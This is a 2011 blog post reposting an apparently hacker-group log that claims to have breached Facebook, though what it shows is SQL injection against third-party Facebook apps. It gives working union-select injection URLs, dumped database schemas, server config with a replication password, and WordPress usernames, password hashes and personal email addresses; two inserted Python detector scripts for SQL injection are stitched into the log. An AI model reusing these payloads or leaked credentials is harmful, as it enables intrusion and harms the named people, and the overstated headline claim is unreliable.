Tuesday, October 18, 2011

The first step of Operation Facebook

As the first step of Operation Facebook, which I mentioned earlier in the article "Will Facebook come to an end on November 5, 2011??", FaceBook's servers were hacked; the data obtained from that is given below.

=================================================================
FaceBook's servers were hacked by Anonymous Srilanka team. Hack of the year!
=================================================================

[0x00] [Introduction]
[0x01] [First impressions]
[0x02] [Search for bugs]
[0x03] [Crash Exploit]
[0x04] [Conclusion]
[0x05] [Greetz]


[Introduction]
+ [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
We did not change the main page, did not sell the backup server and did not delete files.
We have demonstrated the flaw in the system. Start =] ..
   __             __      _    
 /'__`\         /'__`\  /' \    
/\ \/\ \  __  _/\ \/\ \/\_, \  
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \  
 \ \ \_\ \/>  </\ \ \_\ \ \ \ \
  \ \____//\_/\_\\ \____/  \ \_\
   \/___/ \//\/_/ \/___/    \/_/
        [First impressions]
At first glance, FaceBook is a well protected social network.
Scanning the FaceBook server did not give anything interesting ... )
..>
Initiating Parallel DNS resolution of 1 host.
Completed Parallel DNS resolution of 1 host.
Initiating SYN Stealth Scan
Scanning facebook.com (69.63.181.11) [1000 ports]
Discovered open port 443/tcp on 69.63.181.11
Discovered open port 80/tcp on 69.63.181.11
Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
Initiating Service scan
Scanning 2 services on facebook.com (69.63.181.11)
Service scan Timing: About 50.00% done; ETC:
Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
NSE: Script scanning 69.63.181.11.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.38s elapsed
NSE: Script Scanning completed.
Nmap scan report for facebook.com (69.63.181.11)
Host is up (0.17s latency).
Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
Not shown: 998 filtered ports
PORT    STATE SERVICE   VERSION
80/tcp  open  http
443/tcp open  ssl/https
go ahead .. =]

[Search for bugs]
We use GoOgle.com
request: Facebook+Vulnerability [search]
We see a lot of different bugs / exploits / etc ... Mostly only XSS Vulnerabilities

All vulnerabilities are closed (nothing works ... Let us go once again to GoOgle.com
request: site:facebook.com WARNING error
=\ fuck...
    Let us not lose heart) Hackers are not looking for easy ways
Visit Facebook.com
Let us search for bugs in Web Apps.
http://www.facebook.com/robots.txt

oooooooooooooooooooooooooooo
User-agent: *
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

User-agent: Slurp
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

User-agent: msnbot
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

# E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
Sitemap: http://www.facebook.com/sitemap.php
00000000000000000000000000000000

nothing interesting =\

http://apps.facebook.com/tvshowchat/

I looked closely and noticed links

http://apps.facebook.com/tvshowchat/show.php?id=1 (out of habit, check the variable for vulnerability...)

check:

http://apps.facebook.com/tvshowchat/show.php?id=123

ooooooooooooooooooooooooooo

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164

and other....

oooooooooooooooooooooooooooo

O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.

Writing exploits, I got the following:
  http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1

ooooooooooooooooooooooooooo

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

5.0.45-log <= ALERT!!!

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

and other....

oooooooooooooooooooooooooooo

Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log

super = ] Now, we can just say that there is a SQL Injection Vulnerability

http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]

Now we know that there is MySql 5.0.45-log

Then let's write another exploit to display tables with information_schema.tables:

http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1

oooooooooooooooooooooooooooo

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38

Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/

201 <= ALERT!!! 201 tables!

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

and other....

oooooooooooooooooooooooooooo
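Two things made the probes above work: the id parameter went straight into a query, and the raw PHP warnings told the attacker which engine, which file and which MySQL version sat behind the page. The following is an added example, not code from the original log or from any of the applications it names: a small Python detector that URL-decodes the query parameters in constructed access-log lines and flags the payload shapes used above, and a second check that spots the same kind of error disclosure in a constructed response body. The log format, the IPs, the /home/example path and the rule names are assumptions.

```python
"""Added example (not from the original log or from any application named in
it): flag the union-based SQL injection probes and the verbose PHP warnings
that appear in the log above. All log lines, IPs, paths and the response body
below are constructed for the demonstration."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined access-log format (assumed); only the fields used below are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule mirrors one building block of the payloads in the log:
# "1 and 1=2" (boolean logic), "union select", "information_schema",
# "@@version" (server variable) and the "--+1" comment terminator.
SQLI_RULES = [
    ("boolean-logic", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("union-select", re.compile(r"\bunion\b.{0,24}\bselect\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("server-variable", re.compile(r"@@\w+")),
    ("comment-terminator", re.compile(r"--[\s+]|/\*")),
]

# What the raw PHP warnings in the log gave away: the database engine, the
# absolute path of the script and the exact MySQL version. A production app
# should run with display_errors=Off and use parameterised queries so that
# none of these ever reach a client.
LEAK_RULES = [
    ("mysql-error", re.compile(r"Warning: mysql_\w+\(\)")),
    ("xml-parser-error", re.compile(r"simplexml_load_string\(\)[^\n]*parser error")),
    ("server-path", re.compile(r" in /\S+\.php on line \d+")),
    ("version-string", re.compile(r"\b\d+\.\d+\.\d+\w*(?:-\w+)*-(?:log|community)\b")),
]


def decoded_params(target: str) -> dict:
    """URL-decode each query parameter. parse_qsl already turns '+' into a
    space and decodes %xx once; the extra unquote_plus catches double-encoded
    probes (%2527), at the cost of reading a literal '+' as a space."""
    return {
        name: unquote_plus(value)
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True)
    }


def classify_request(line: str):
    """Parse one access-log line and return (ip, path, hits), where hits maps
    each suspicious parameter to the rule names it triggered. Returns None if
    the line does not match the log format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    hits = {}
    for name, value in decoded_params(m.group("target")).items():
        matched = [rule for rule, rx in SQLI_RULES if rx.search(value)]
        if matched:
            hits[name] = matched
    return m.group("ip"), urlsplit(m.group("target")).path, hits


def scan_log(text: str) -> list:
    """Return the classified entries that carry at least one injection indicator."""
    findings = []
    for line in text.splitlines():
        entry = classify_request(line)
        if entry is not None and entry[2]:
            findings.append(entry)
    return findings


def leaked_error_details(body: str) -> set:
    """Return the kinds of internal detail a response body discloses."""
    return {kind for kind, rx in LEAK_RULES if rx.search(body)}


# Constructed sample traffic: two benign requests, the two probes from the log
# above, then a benign request whose value merely contains the word "union".
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2011:22:41:07 +0000] "GET /tvshowchat/show.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [18/Oct/2011:22:41:19 +0000] "GET /tvshowchat/show.php?id=123 HTTP/1.1" 200 2048
203.0.113.5 - - [18/Oct/2011:22:42:03 +0000] "GET /tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1 HTTP/1.1" 200 2310
203.0.113.5 - - [18/Oct/2011:22:42:40 +0000] "GET /tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1 HTTP/1.1" 200 2299
198.51.100.9 - - [18/Oct/2011:22:43:01 +0000] "GET /tvshowchat/show.php?id=7&name=union+station HTTP/1.1" 200 5010
"""

# Constructed response body in the shape of the warnings quoted above
# (the path is a placeholder, not one from the log).
SAMPLE_BODY = (
    "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result "
    "resource in /home/example/app/tv/show.php on line 28\n"
    "5.0.45-log\n"
)

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}: {hits}")
    print("response discloses:", sorted(leaked_error_details(SAMPLE_BODY)))
```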
        133.  
http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL 123]

Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log

1) AdCode
2) AdTrack
3) Admin_DataStore
4) Admin_User
5) Challenges
6) ChallengesCompleted
7) Comments
8) ContactEmails
9) Content
10) ContentImages
11) FeaturedTemplate
12) FeaturedWidgets
13) Feeds
14) FolderLinks
15) Folders
16) ForumTopics
17) Log
18) LogDumps
19) Newswire
20) NotificationMessages
21) Notifications
22) Orders
23) OutboundMessages
24) Photos
25) Prizes
26) RawExtLinks
27) RawSessions
28) SessionLengths
29) Sites
30) Subscriptions
31) SurveyMonkeys
32) SystemStatus
33) Templates
34) User
35) UserBlogs
36) UserCollectives
37) UserInfo
38) UserInvites
39) Videos
40) WeeklyScores
41) Widgets
42) cronJobs
43) fbSessions

Admin_User

1) id
2) name
3) email
4) password
5) userid
6) ncUid
7) level

User

1) userid
2) ncUid
3) name
4) email
5) isAdmin
6) isBlocked
7) votePower
8) remoteStatus
9) isMember
10) isModerator
11) isSponsor
12) isEmailVerified
13) isResearcher
14) acceptRules
15) optInStudy
16) optInEmail
17) optInProfile
18) optInFeed
19) optInSMS
20) dateRegistered
21) eligibility
22) cachedPointTotal
23) cachedPointsEarned
24) cachedPointsEarnedThisWeek
25) cachedPointsEarnedLastWeek
26) cachedStoriesPosted
27) cachedCommentsPosted
28) userLevel

http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL shevantha]

Current Database : signalpa_fbmFundRraise
Database User : signalpa_rockaja@localhost
MySQL Version : 5.0.85-community

DATABASE
1) information_schema
2) signalpa_CelebrityPuzzle
3) signalpa_EBF
4) signalpa_appNotification
5) signalpa_appnetwork
6) signalpa_dailyscriptures
7) signalpa_ebayfeed
8) signalpa_fbmFundRraise
9) signalpa_fbmFundRraisebeta
10) signalpa_netcards
11) signalpa_paypal
12) signalpa_thepuzzle

signalpa_fbmFundRraise
1) Campaigns
2) Campaigns_Temp
3) FB_theme
4) IfundDollars
5) Languages
6) Payments
7) Paymentsoops
8) Supporters
9) Users
10) Withdrawals
11) invites
12) invites_copy
13) mp_passwords
14) payment_codes
15) txt_codes
16) valid_servers
17) weeklyBonus

    Column: Users

1) id
2) name
3) email
4) mobile_no
5) address
6) country
7) password
8) organisation
9) date_created
10) date_updated
11) status
12) facebook_id
13) isFacebookFan
14) verify
15) paypalUse
16) paypalEmail
17) bacUse
18) bacAcc
19) bacName
20) bacLocation
21) bacCountry
22) bacIBAN
23) bacSort_code
24) current_rank
25) new_rank
26) cronjob
27) max_fundraise

    Column: mp_passwords

1) id
2) password
3) username
4) status
5) number
6) rc
7) referer
8) transID
9) currency
10) transType
11) amount
12) confirmed
13) date

signalpa_paypal
1) paypal_cart_info
2) paypal_payment_info
3) paypal_subscription_info

Column: paypal_cart_info
1) txnid
2) itemname
3) itemnumber
4) os0
5) on0
6) os1
7) on1
8) quantity
9) invoice
10) custom

    Column : paypal_payment_info

1) firstname
2) lastname
3) buyer_email
4) street
5) city
6) state
7) zipcode
8) memo
9) itemname
10) itemnumber
11) os0
12) on0
13) os1
14) on1
15) quantity
16) paymentdate
17) paymenttype
18) txnid
19) mc_gross
20) mc_fee
21) paymentstatus
22) pendingreason
23) txntype
24) tax
25) mc_currency
26) reasoncode
27) custom
28) country
29) datecreation

http://apps.facebook.com/tvshowchat/show.php?id=[SQL shevantha]

Current Database : tv
Database User : tomkincaid@ps5008.dreamhost.com
MySQL Version : 5.0.45-log

    DATABASES

1) information_schema
2) astro
3) candukincaid
4) cemeteries
5) churchwpdb
6) countdownapp
7) crush
8) dare
9) friendiq
10) giants
11) hookup
12) jauntlet
13) loccus
14) luciacanduwp
15) maps
16) martisor
17) mediax
18) mostlikely
19) music
20) pimpfriends
21) plans
22) politicsapp
23) postergifts
24) posters2
25) projectbasecamp
26) pwnfriends
27) quiz
28) seeall
29) send
30) supporter
31) swapu
32) tomsapps
33) travelbug

    tab.send

1) app
2) item
3) itemforuser
4) neverblue
5) user

    Columns

user(12454)

1) userid
2) siteid
3) appkey
4) session
5) points
6) added
7) removed

Tab. candukincaid

1) wp_comments
2) wp_links
3) wp_options
4) wp_post****
5) wp_posts
6) wp_px_albumPhotos
7) wp_px_albums
8) wp_px_galleries
9) wp_px_photos
10) wp_px_plugins
11) wp_term_relationships
12) wp_term_taxonomy
13) wp_terms
14) wp_user****
15) wp_users

    Column wp_users

1) ID
2) user_login
3) user_pass
4) user_nicename
5) user_email
6) user_url
7) user_registered
8) user_activation_key
9) user_status
10) display_name

etc...

http://apps.facebook.com/fluff/fluffbook.php?id=[SQL shevantha]

> ~ facebook_exploit [ENTER]


http://apps.facebook.com/snowago/area.php?areaid=[SQL Shevantha]

Database: affinispac_fb
User: affinispac_fb@localhost
Version: 5.0.67-community

http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Shevantha]

>plucky@localhost : facebook : 4.0.13-log

etc... =]

Next xD

Database: thetvdb
User: thetvdb@localhost
Version: 5.0.51a-24-log

[Database]: thetvdb

[1]aka_seriesname
[2]apiusers
[3]banners
[4]deletions
[5]genres
[6]imgstatus
[7]languages
[8]mirrors
[9]networks
[10]ratings
[11]runtimes
[12]seriesactors
[13]seriesupdates
[14]translation_episodename
[15]translation_episodeoverview
[16]translation_labels
[17]translation_seriesname
[18]translation_seriesoverview
[19]tvepisodes
[20]tvseasons
[21]tvseries
[22]user_episodes
[23]users

users:

   id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
   favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
   lastupdatedby_admin,mirrorupdate

[userpass]


[Database]: wiki

[24]archive
[25]categorylinks
[26]externallinks
[27]filearchive
[28]hitcounter
[29]image
[30]imagelinks
[31]interwiki
[32]ipblocks
[33]job
[34]langlinks
[35]logging
[36]math
[37]objectcache
[38]oldimage
[39]page
[40]page_restrictions
[41]pagelinks
[42]querycache
[43]querycache_info
[44]querycachetwo
[45]recentchanges
[46]redirect
[47]revision
[48]searchindex
[49]site_stats
[50]templatelinks
[51]text
[52]trackbacks
[53]transcache
[54]user
[55]user_groups
[56]user_newtalk
[57]watchlist

user:

  user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
  user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
  user_email_token_expires,user_registration,user_editcount

['user_name'] : ['user_pass']

        681.  
        682. ---------------------------------------------------------------------------------------------------------------------------------------------------
        683.  
        684. read /etc/hosts
        685.  
        686. 127.0.0.1 localhost localhost.localdomain
        687. 192.168.1.167 140696-db2.flufffriends.com 140696-db2
        688. 192.168.1.166 140695-db1.flufffriends.com 140695-db1
        689. 192.168.1.165 140694-web2.flufffriends.com 140694-web2
        690. 192.168.1.164 140693-web1.flufffriends.com 140693-web1
        691. 69.63.176.141 api.facebook.com
        692. 208.116.17.80 peanutlabs.com
        693.  
        694. ----------------------------------
        695.  
        696. /etc/my.cnf
        697.  
        698. #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
        699.  
        700. log-bin=/var/lib/mysqllogs/bin-log
        701.  
        702. binlog-do-db=fluff2
        703.  
        704. expire-logs-days=14
        705.  
        706.  
        707.  
        708. server-id = 5
        709.  
        710.  
        711.  
        712. #master-host=69.63.176.141
        713.  
        714. #master-user=romis_user
        715.  
        716. #master-password=romis0123
        717.  
        718. #master-connect-retry=60
        719.  
        720. replicate-do-db=miserman
        721.  
        722.  
        723. #log-slave-updates
        724.  
        725. expire_logs_days = 14
        726.  
        727.  
        728. I think we found a sufficient number of vulnerabilities!

---------------------------

   __             __      __    
 /'__`\         /'__`\  /'__`\  
/\ \/\ \  __  _/\ \/\ \/\_\L\ \  
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
 \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
      [Crash Exploit]

So .. Moving on to the fun, friends

To avoid vandalism by script-kiddies I will not give you a link to shell.php, but I enclose images and some interesting queries =]

..> Exploit start . + . + . + . + . + . + .

wp_posts

post_password

wp_users

user_pass

done.....

WordPress! oO one of the modules installed in Facebook is WordPress!

check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1

oooooooooooooooooooooooooooo

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67

3 <= ALERT! Users! =]

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124

oooooooooooooooooooooooooooo

..> Crach_exploit [ENTER]

user:

admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.

cracker:

admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.   :tom:tom_kincaid@hotmail.com

see request:

http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--

goOd =] Nice Hacking old school xD
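As an added defender-side example (not part of the log above, nor code from the team that wrote it or from the app's author): the requests quoted for show.php?id=... are plain GET requests, so every one of them lands in the web server's access log, which is where an operator would have caught this. The script below parses Apache combined-format lines, decodes each query-string parameter the way PHP's `$_GET` would have seen it, and flags values carrying the UNION SELECT, boolean and comment patterns visible above, then counts hits per client address. The log lines, client addresses and the database name are constructed placeholders.

```python
"""Flag UNION-style SQL injection attempts in web server access logs.

Added example, not part of the original post. The log lines, client
addresses and database name below are constructed placeholders.
"""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample log; the payloads mirror the shape of the requests
# quoted above but point at a placeholder database name.
LOG_LINES = [
    '203.0.113.5 - - [18/Oct/2011:10:01:02 +0000] "GET /tvshowchat/show.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2011:10:01:09 +0000] "GET /tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+exampledb.wp_users--+1 HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2011:10:01:15 +0000] "GET /tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+exampledb.wp_users+limit+1,1-- HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2011:10:02:30 +0000] "GET /tvshowchat/show.php?id=42&tab=comments HTTP/1.1" 200 4880 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2011:10:02:41 +0000] "POST /tvshowchat/post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Apache "combined" format: ip ident user [time] "method target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) \S+'
)

# Each rule is (name, regex); they run against the *decoded* parameter value.
RULES = [
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("boolean-tautology", re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+", re.I)),
    ("sql-comment", re.compile(r"--(\s|$)|/\*")),
    ("sql-function", re.compile(
        r"\b(concat_ws|concat|group_concat|information_schema|load_file)\b", re.I)),
]


def classify_value(value: str) -> List[str]:
    """Names of every rule that matches a decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_log(lines) -> List[Dict]:
    """One finding per suspicious parameter value, in log order."""
    findings: List[Dict] = []
    for n, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip the line rather than crash
        parts = urlsplit(m.group("target"))
        # parse_qs percent-decodes and maps '+' to space, i.e. it yields the
        # value the PHP script actually received in $_GET.
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                hits = classify_value(value)
                if hits:
                    findings.append({
                        "line": n, "ip": m.group("ip"), "path": parts.path,
                        "param": param, "value": value, "rules": hits,
                    })
    return findings


def sources(findings: List[Dict]) -> Counter:
    """How many flagged requests each client address sent."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan_log(LOG_LINES)
    for f in found:
        print(f"line {f['line']} {f['ip']} {f['path']} "
              f"{f['param']}={f['value']!r} -> {', '.join(f['rules'])}")
    print("per source:", dict(sources(found)))
```

Decoding before matching is the part that matters: the third sample request hides its parentheses as %28/%29, so a rule run on the raw log text would miss `concat_ws(`, while the backend saw it perfectly well. The same decoded value is what a parameterised query (PDO / mysqli prepared statements instead of string concatenation into the SQL) would have treated as a harmless integer-looking string.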

   __             __   __ __      
 /'__`\         /'__`\/\ \\ \    
/\ \/\ \  __  _/\ \/\ \ \ \\ \    
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_  
 \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
  \ \____//\_/\_\\ \____/\/_/\_\_/
   \/___/ \//\/_/ \/___/    \/_/  
           [Conclusion]

There's no 100% security! Be safe, my friends! Watch for vulnerabilities and promptly update! (Exploit Database)

   __             __   ______    
 /'__`\         /'__`\/\  ___\  
/\ \/\ \  __  _/\ \/\ \ \ \__/  
\ \ \ \ \/\ \/'\ \ \ \ \ \___``\
 \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
             [Greetz]



Seen it? Well then, leave a comment before you go, shall we?